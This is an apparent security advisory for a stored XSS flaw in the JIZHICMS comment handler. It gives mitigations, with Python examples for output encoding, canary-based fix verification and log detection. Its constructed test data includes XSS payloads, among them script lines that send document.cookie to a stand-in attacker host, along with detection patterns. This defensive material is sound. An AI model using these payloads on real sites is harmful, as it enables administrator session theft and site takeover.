CVE-2025-14013

2.4 LOW

📋 TL;DR

A stored cross-site scripting (XSS) flaw in JIZHICMS. The body parameter of the comment handler at /index.php/admins/Comment/addcomment.html is stored without encoding, so script supplied in a comment runs later in the browser of any administrator who views that comment, with the administrator's session and privileges. All JIZHICMS installations up to and including version 2.5.5 with the comment function enabled are affected.

💻 Affected Systems

Products:
  • JIZHICMS
Versions: up to and including 2.5.5
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires the comment function to be enabled. The flaw is in the comment handler reached at /index.php/admins/Comment/addcomment.html. That route sits under the admin module, so check whether your deployment exposes it to unauthenticated users before treating this as a drive-by risk (see Exploit Status).

⚠️ Risk & Real-World Impact

🔴 Worst Case

Administrator account takeover leading to complete CMS compromise, data theft, or website defacement.

🟠 Likely Case

Hijacking of an administrator's session: the injected script can steal the session cookie if it is not marked HttpOnly, and can otherwise drive the admin interface directly from the administrator's browser to change content or create further privileged accounts.

🟢 If Mitigated

No impact once comment bodies are entity-encoded where the admin view renders them; a restrictive Content Security Policy on the admin UI further limits what any residual injection can do.

🌐 Internet-Facing: HIGH - The comment form is reachable by anyone who can reach the site, and the payload fires later in an administrator's browser. Caveat: the vulnerable route sits under the admin module (/index.php/admins/...) and the 2.4 LOW score listed above is consistent with an attack that needs privileges, so confirm whether unauthenticated users can reach this handler in your deployment.
🏢 Internal Only: MEDIUM - Exploitable from the internal network by anyone who can submit a comment, but an administrator must view the stored comment for the script to run.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit details are reported to be on GitHub (no link is given on this page). The payload only runs when an administrator views the stored comment. The handler path is under /admins/, which suggests authentication may be required; treat the "unauthenticated" rating above as unconfirmed until you have checked who can reach the route.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch is listed on this page. Check the vendor's release channel for a version later than 2.5.5 that addresses the comment handler; until one is available, apply the workarounds below and review comments that are already stored, since existing payloads remain live until they are re-encoded or deleted.

🔧 Temporary Workarounds

Input Validation and Output Encoding

Applies to: all

Encode the comment body as HTML entities at the point where it is rendered in the admin comment view, and validate it on input as defence in depth. Output encoding is what neutralises payloads that are already stored, so make sure existing comments are displayed through the same encoded path.

Change the controller action behind the route /index.php/admins/Comment/addcomment.html, and the template that displays stored comments, so that the body value is entity-encoded before it reaches the page. In PHP this is htmlspecialchars($body, ENT_QUOTES, 'UTF-8') at output, matched to the context (element body, quoted attribute, or URL), rather than a blocklist on input.
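The difference between the vulnerable and hardened rendering, as an added example in Python (it is not JIZHICMS code, which is PHP; the <td> template fragments, the PAYLOADS list and the active_content() checker are constructed for illustration). The point it makes beyond the text above is that the encoder must match the context the body lands in: entity encoding neutralises tag and attribute injection, but a javascript: URL contains no special characters and survives encoding untouched, so a URL context needs scheme allow-listing instead.

```python
"""Unsafe vs. hardened rendering of a stored comment `body`.

Added illustration, not JIZHICMS code. The <td> template fragments, the
PAYLOADS and the active_content() checker are constructed for this example.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed payloads of the kind a comment body could carry.
PAYLOADS = [
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
    '" onmouseover="alert(1)',        # breaks out of a quoted attribute
    '<img src=x onerror=alert(1)>',   # executes without any <script> tag
    'javascript:alert(1)',            # harmless as text, dangerous as a URL
]

def render_unsafe(body):
    """Vulnerable pattern: the stored body is interpolated verbatim."""
    return f'<td class="comment-body">{body}</td>'

def render_safe(body):
    """Element-body context: entity-encode < > & and both quote characters."""
    return f'<td class="comment-body">{html.escape(body, quote=True)}</td>'

def render_attr_unsafe(body):
    """Vulnerable pattern in an attribute context."""
    return f'<td class="comment-body" title="{body}"></td>'

def render_attr_safe(body):
    """Attribute context: same encoder, and the attribute must be quoted."""
    return f'<td class="comment-body" title="{html.escape(body, quote=True)}"></td>'

def render_link_escaped_only(url):
    """Encoding alone does NOT fix a URL context: javascript: has nothing to escape."""
    return f'<a href="{html.escape(url, quote=True)}">link</a>'

SAFE_SCHEMES = {"http", "https", "mailto"}

def render_link_safe(url):
    """URL context: allow-list the scheme first, then encode. Relative links
    are rejected here on purpose; widen the allow-list if you need them."""
    if urlsplit(url.strip()).scheme.lower() not in SAFE_SCHEMES:
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">link</a>'

class _ActiveContentDetector(HTMLParser):
    """Records markup that could run script: unexpected tags, on* handlers and
    javascript: URLs. HTMLParser hands attribute values over entity-decoded,
    so a raw java&#115;cript: in an href is caught as well."""
    def __init__(self, allowed_tags):
        super().__init__()
        self.allowed_tags = allowed_tags
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.allowed_tags:
            self.findings.append(f"unexpected tag <{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} on <{tag}>")

def active_content(rendered, allowed_tags=("td", "a")):
    """Return the script-capable constructs found in rendered HTML; an empty
    list means the body was rendered inert in that context."""
    detector = _ActiveContentDetector(set(allowed_tags))
    detector.feed(rendered)
    detector.close()
    return detector.findings

if __name__ == "__main__":
    for body in PAYLOADS:
        print(repr(body))
        print("  unsafe text ctx:", active_content(render_unsafe(body)) or "inert")
        print("  safe   text ctx:", active_content(render_safe(body)) or "inert")
        print("  unsafe attr ctx:", active_content(render_attr_unsafe(body)) or "inert")
        print("  safe   attr ctx:", active_content(render_attr_safe(body)) or "inert")
    print("href, escaped only:", active_content(render_link_escaped_only(PAYLOADS[3])))
    print("href, allow-listed:", active_content(render_link_safe(PAYLOADS[3])) or "inert")
```

Note that the attribute break-out payload is inert in the element-body context and the <img onerror> payload is inert inside a quoted attribute: which payloads matter depends entirely on where the template puts the body, which is why the encoder has to be chosen per output location rather than applied once on input.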

Disable Comment Handler

Applies to: all

Temporarily disable comment submission until a fix is available. Comments that are already stored remain a risk until they are reviewed, re-encoded or deleted.

Remove or comment out the comment handler's route in the CMS configuration, or block POST requests to /index.php/admins/Comment/addcomment.html at the web server or reverse proxy.

🧯 If You Can't Patch

  • Add a Content Security Policy to the admin UI that disallows inline script (a nonce- or hash-based script-src). This blunts the injected payload but will break an admin panel that relies on inline scripts, so roll it out with Content-Security-Policy-Report-Only first and enforce only once the reports are clean.
  • Add WAF rules for the body parameter on POST /index.php/admins/Comment/addcomment.html. Match after URL decoding and on event-handler attributes (on*=) and javascript: URLs, not just a literal <script>, and treat the WAF as a stopgap, since filter bypasses are routine.
  • Mark the admin session cookie HttpOnly and SameSite so that a successful injection cannot simply read the cookie; it can still act through the admin's browser, so this limits rather than removes the impact.

🔍 How to Verify

Check if Vulnerable:

Vulnerable if JIZHICMS is version 2.5.5 or earlier and the comment function is enabled. Since no fixed version is listed, treat every installation as vulnerable until the vendor confirms a fix.

Check Version:

Read the version from the admin dashboard or from the CMS configuration files (this page does not give the exact file path).

Verify Fix Applied:

Submit a comment whose body contains a harmless, unique marker wrapped in a tag (not a live alert()), then open the admin comment view. The fix is effective when the marker is displayed as literal text, that is, entity-encoded in the page source rather than parsed as an element. Test every place the body is shown (list view, detail or edit view), because each template is a separate output context.
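The classification step of that check, as an added example in Python (not JIZHICMS code). Against a live instance you would submit the canary through the body parameter of /index.php/admins/Comment/addcomment.html and then pass the admin comment page source to classify_reflection(); the admin-view fragments under __main__ are constructed here so the script runs offline. The point is to tell apart the four outcomes a tester actually sees, which a single "is the payload there" grep conflates.

```python
"""Verify-fix check for a stored-XSS fix in a comment view.

Added example, not JIZHICMS code. The admin-page fragments in __main__ are
constructed; against a live instance, submit the canary via the `body`
parameter and feed the admin comment page source to classify_reflection().
"""
import html
import secrets

def make_canary(tag="xsscheck"):
    """A harmless unique marker instead of alert(): it proves the comment was
    stored, is grep-able in logs, and cannot hurt the admin who views it."""
    token = secrets.token_hex(4)
    return f'<{tag} data-t="{token}">{token}</{tag}>', token

def classify_reflection(page_html, canary, token):
    """Distinguish the outcomes a tester needs to act on differently."""
    if canary in page_html:
        return "raw"        # marker emitted as markup: still vulnerable
    if canary in html.unescape(page_html):
        return "encoded"    # entity-encoded, displays as text: fixed in this context
    if token in page_html:
        return "stripped"   # tags removed, text kept: a sanitizer is in the path
    return "absent"         # not stored, or blocked upstream (WAF, validation)

if __name__ == "__main__":
    canary, token = make_canary()
    samples = {   # constructed admin-view fragments for each outcome
        "unpatched": f'<td class="comment-body">{canary}</td>',
        "encoded":   f'<td class="comment-body">{html.escape(canary, quote=True)}</td>',
        "sanitized": f'<td class="comment-body">{token}</td>',
        "blocked":   '<td class="comment-body"></td>',
    }
    for name, fragment in samples.items():
        print(f"{name:10s} -> {classify_reflection(fragment, canary, token)}")
```

"stripped" and "absent" both look like a pass in a naive test but are not the same as a fix: a tag-stripping sanitizer or a WAF block in front of the handler leaves the unencoded output path in place, and a payload that evades the filter will still execute.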

📡 Detection & Monitoring

Log Indicators:

  • Comment submissions whose body contains HTML tags, event-handler attributes or JavaScript (only visible if the log source records POST parameters)
  • Repeated submissions from one client with URL- or entity-encoded payloads, which indicate bypass attempts against a filter or WAF

Network Indicators:

  • POST requests to /index.php/admins/Comment/addcomment.html whose body parameter contains markup, event-handler attributes or javascript: URLs

SIEM Query (literal match; catches only unencoded payloads):

source="web_logs" AND uri="/index.php/admins/Comment/addcomment.html" AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")

The body field must come from a source that records POST parameters (WAF, reverse proxy or application log); default web-server access logs do not. URL-decode and case-fold the field before matching, and extend the terms to event-handler attributes (onerror=, onload=, onmouseover=) and script-capable tags other than <script> (img, svg, iframe), otherwise trivially encoded or mixed-case payloads are missed.
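The normalised version of that query, run over sample log records, as an added example in Python (not from this page or the vendor). It assumes a log source that exports one JSON object per request including the POST parameters; the SAMPLE_LOG records are constructed in that shape and the attacker addresses are documentation ranges. It shows what the literal query above misses: mixed case, single and double percent-encoding, an entity-encoded javascript: URL, and an <img onerror> payload that contains no <script> at all.

```python
"""Detection over request logs for the comment-handler XSS.

Added example, not from the page or the vendor. Default web-server access
logs do not record POST bodies, so this assumes a source that does (WAF,
reverse-proxy or application log) exporting one JSON object per request;
SAMPLE_LOG is constructed in that shape.
"""
import json
import re
from html import unescape
from urllib.parse import unquote_plus

TARGET_URI = "/index.php/admins/Comment/addcomment.html"

# Broader than a literal "<script>" match: tags that fire without <script>,
# inline event handlers and javascript: URLs. Tune the on*= rule to your
# traffic if ordinary comment text trips it.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*(?:img|svg|iframe|object|embed|body|video|audio|details)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),
    re.compile(r"javascript\s*:", re.I),
]

def normalize(value, rounds=3):
    """Undo the layers used to slip past literal matches: repeated
    percent-decoding, then HTML entity decoding, then drop the control
    characters browsers ignore inside tag names and URL schemes."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = unescape(value)
    return re.sub(r"[\t\r\n\x00]", "", value)

def inspect_event(event):
    """Return a finding dict for a suspicious comment submission, else None."""
    if event.get("method") != "POST":
        return None
    if event.get("uri", "").split("?", 1)[0] != TARGET_URI:
        return None
    body = event.get("params", {}).get("body", "")
    normalized = normalize(body)
    matched = [p.pattern for p in XSS_PATTERNS if p.search(normalized)]
    if not matched:
        return None
    return {"client": event.get("client"), "matched": matched, "decoded_body": normalized[:120]}

def scan(lines):
    """Parse JSON-lines log records and return every finding in log order."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        finding = inspect_event(json.loads(line))
        if finding:
            findings.append(finding)
    return findings

# Constructed sample records: one benign comment, four attack variants, one
# request to an unrelated route that must not alert.
SAMPLE_LOG = r'''
{"client": "203.0.113.10", "method": "POST", "uri": "/index.php/admins/Comment/addcomment.html", "params": {"body": "Great article, thanks!"}}
{"client": "198.51.100.7", "method": "POST", "uri": "/index.php/admins/Comment/addcomment.html", "params": {"body": "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"}}
{"client": "198.51.100.7", "method": "POST", "uri": "/index.php/admins/Comment/addcomment.html", "params": {"body": "%3CScRiPt%3Ealert(1)%3C/script%3E"}}
{"client": "198.51.100.8", "method": "POST", "uri": "/index.php/admins/Comment/addcomment.html", "params": {"body": "%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E"}}
{"client": "198.51.100.9", "method": "POST", "uri": "/index.php/admins/Comment/addcomment.html", "params": {"body": "<a href=\"java&#115;cript:alert(1)\">click</a>"}}
{"client": "203.0.113.11", "method": "GET", "uri": "/index.php/index/article/list.html", "params": {"q": "<script>alert(1)</script>"}}
'''.strip().splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Against the six constructed records only the benign comment and the request to the unrelated route are silent; the literal query on this page would have flagged just the first attack record. Scope the rule to POST on the exact route, as here, to keep the broader patterns from alerting on ordinary HTML in unrelated admin traffic.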
